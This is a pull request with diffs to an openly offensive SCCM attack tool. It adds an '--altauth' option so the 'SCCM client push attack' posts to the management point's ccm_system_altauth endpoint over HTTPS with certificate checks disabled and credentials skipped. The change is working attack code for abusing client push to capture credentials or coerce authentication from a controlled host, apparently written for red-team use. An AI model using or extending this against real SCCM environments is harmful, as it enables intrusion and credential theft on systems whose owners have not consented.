### PR TITLE
altauth option for http client push install

### DIFF
--- a/lib/attacks/http.py
+++ b/lib/attacks/http.py
@@ -22,7 +22,7 @@ class HTTP:
     def __init__(self, username=None, password=None, domain=None, target_dom=None,
                     dc_ip=None,ldaps=False, channel_binding=False, signing=False, kerberos=False, no_pass=False, hashes=None,
                     aes=None, debug=False, auto=False, computer_pass=None, computer_hash=None,computer_name=None,
-                    uuid=None, mp=None, sp=False, spcn=None, sppid=None, spanon=False,sleep=None, logs_dir=None):
+                    uuid=None, mp=None, sp=False, spcn=None, sppid=None, spanon=False, altauth=False, sleep=None, logs_dir=None):
         self.username = username
         self.password = password
         self.domain = domain
@@ -48,6 +48,7 @@ class HTTP:
         self.spcn = spcn
         self.sppid = sppid
         self.spanon = spanon
+        self.altauth =altauth
         self.sleep = int(sleep)
         self.targets = []
         self.logs_dir = logs_dir
@@ -91,7 +92,7 @@ class HTTP:
             #TODO: Need some terminal output for actions taken
             #      Need better error handling
             target_mp_url = f"http://{self.mp}"
-            sccmwtf = SCCMTools(target_name="", target_fqdn="", target_sccm=target_mp_url, target_username="", target_password="", sleep=self.sleep, logs_dir=self.logs_dir,sp=self.sp,plid=self.sppid)
+            sccmwtf = SCCMTools(target_name="", target_fqdn="", target_sccm=target_mp_url, target_username="", target_password="", sleep=self.sleep, logs_dir=self.logs_dir,sp=self.sp,altauth=self.altauth, eplid=self.sppid)
             with open (f"{self.logs_dir}/{self.uuid}.data", "rb") as f:
                 data = f.read()
             with open (f"{self.logs_dir}/{self.uuid}.pem", "rb") as g:
@@ -124,7 +125,6 @@ class HTTP:
     def sccm_push(self):
         logger.info(f"[*] Performing SCCM client push attack")
         key = None
-
         if self.uuid:
             logger.info(f"Detected uuid, trying to reuse alreday created client with uuid: {self.uuid}, \n[!] probably wont work since client needs to be not installed to trigger sccm push... ")
             with open (f"{self.logs_dir}/{self.uuid}.pem", "rb") as g:
@@ -133,6 +133,11 @@ class HTTP:
             logger.info(f"Detected provided computer name and credentials, trying to reuse already existing computer to enroll a new client !")
             if not self.computer_pass:
                 self.computer_pass = '0'*32 + ':' + self.computer_hash
+        # Skip credential check/creation if using alt auth endpoint
+        # set Anon auth to true since authentication is not needed for this endpoint
+        elif (self.altauth):
+            self.spanon = True
+            pass
         elif (self.spanon):
             pass
         else:
@@ -162,7 +167,7 @@ class HTTP:
         sccmwtf = SCCMTools(target_name=self.spcn, target_fqdn=target_fqdn, 
                             target_sccm=self.mp,target_username=self.username, 
                             target_password=self.password, sleep=self.sleep, 
-                            logs_dir=self.logs_dir,sp=self.sp,plid=self.sppid)
+                            logs_dir=self.logs_dir,sp=self.sp,altauth=self.altauth, plid=self.sppid)
         try:
             uuid = self.uuid
             if not uuid:

--- a/lib/attacks/http.py
+++ b/lib/attacks/http.py
@@ -92,7 +92,7 @@ class HTTP:
             #TODO: Need some terminal output for actions taken
             #      Need better error handling
             target_mp_url = f"http://{self.mp}"
-            sccmwtf = SCCMTools(target_name="", target_fqdn="", target_sccm=target_mp_url, target_username="", target_password="", sleep=self.sleep, logs_dir=self.logs_dir,sp=self.sp,altauth=self.altauth, eplid=self.sppid)
+            sccmwtf = SCCMTools(target_name="", target_fqdn="", target_sccm=target_mp_url, target_username="", target_password="", sleep=self.sleep, logs_dir=self.logs_dir,sp=self.sp,altauth=self.altauth, plid=self.sppid)
             with open (f"{self.logs_dir}/{self.uuid}.data", "rb") as f:
                 data = f.read()
             with open (f"{self.logs_dir}/{self.uuid}.pem", "rb") as g:

--- a/lib/commands/http.py
+++ b/lib/commands/http.py
@@ -30,7 +30,8 @@ def main(
     sleep           : str   = typer.Option(10, '-sleep', help='Time to wait between registering and requesting policies'),
     sccmpush        : bool  = typer.Option(False, "--sccm-push", "-sp", help="[Optional] Try to trigger sccm push on specified client"),
     sccmpush_client : str   = typer.Option(None, "--sccm-push-cn", "-spcn", help="[Mandatory with --sccm-push] client name to be registerd when performing sccm push attack which should be a controlled & reachable IP/FQDN)"),
-    sccmpush_anon   : bool   = typer.Option(False, "--sccm-push-anonymous", "-spanon", help="try to perform sccm push without credentials"),
+    sccmpush_anon   : bool  = typer.Option(False, "--sccm-push-anonymous", "-spanon", help="try to perform sccm push without credentials"),
+    altauth         : bool  = typer.Option(False, "--altauth", help="Connect to Management Point using alt_auth URL (https://<MP>/ccm_system_altauth/request"),
     platform_id     : str   = typer.Option("Microsoft Windows NT Workstation 2010.0","--sccm-push-plid", "-sppid", help="[Optional] Specify the plateformID when performing sccm push attack (ex: Microsoft Windows NT Server 10.0)")
     ):
 
@@ -39,7 +40,7 @@ def main(
     httphunter = HTTP(username=username, password=password, domain=domain, dc_ip=dc_ip,ldaps=ldaps,
                             kerberos=kerberos, no_pass=no_pass, hashes=hashes, aes=aes, debug=debug, auto=auto, channel_binding=channel_binding, signing=signing,
                             computer_pass=computer_pass, computer_name=computer_name, computer_hash=computer_hash, uuid=uuid, mp=mp,
-                            sp=sccmpush, spcn=sccmpush_client,sppid=platform_id, spanon=sccmpush_anon,sleep=sleep, logs_dir=logs_dir)
+                            sp=sccmpush, spcn=sccmpush_client,sppid=platform_id, spanon=sccmpush_anon,altauth=altauth, sleep=sleep, logs_dir=logs_dir)
     httphunter.run()
 
 

--- a/lib/scripts/sccmwtf.py
+++ b/lib/scripts/sccmwtf.py
@@ -151,7 +151,7 @@ class CryptoTools:
 
 class SCCMTools():
 
-    def __init__(self, target_name, target_fqdn, target_sccm, target_username, target_password,sleep, logs_dir,sp=False,plid=None):
+    def __init__(self, target_name, target_fqdn, target_sccm, target_username, target_password,sleep, logs_dir,sp=False,plid=None, altauth=False):
         self._server = target_sccm
         self._serverURI = f"http://{self._server}"
         self._target_name = target_name
@@ -162,7 +162,11 @@ class SCCMTools():
         self.logs_dir = logs_dir
         self.sp = sp
         self.plid = plid
+        self.altauth = altauth
         self.domain = target_fqdn.replace(self._target_name+".","")
+
+        if (altauth):
+            self._serverURI=f"https://{self._server}"
 
     def sendCCMPostRequest(self, data, auth=False, username="", password="", mp = "", policies=True):
         headers = {
@@ -250,7 +254,10 @@ class SCCMTools():
         self.sendCCMPostRequest(data)
             
     def sendCCMPostRequestWithOutAuth(self, data, headers,policies=True):
-        r = requests.request("CCM_POST", f"{self._serverURI}/ccm_system/request", headers=headers, data=data)
+        if(self.altauth):
+             r = requests.request("CCM_POST", f"{self._serverURI}/ccm_system_altauth/request", headers=headers, data=data,  verify=False)
+        else:
+            r = requests.request("CCM_POST", f"{self._serverURI}/ccm_system/request", headers=headers, data=data)
         #check if the response actually has a body, if not sleep and try again
         if r.headers.get('Content-Length') == "0":
             logger.info(f"[*] Policy isn't ready yet, sleeping {self.sleep} seconds.")


### PR DESCRIPTION
Extended the client push functionality for the http module so you can specify to use the "[altauth](https://www.synacktiv.com/sites/default/files/2025-08/def-con-33-mehdi-elyassa-sccm-the-tree-that-always-bears-bad-fruits.pdf#page=9)" endpoint. Let me know if there is any changes you would like to see. 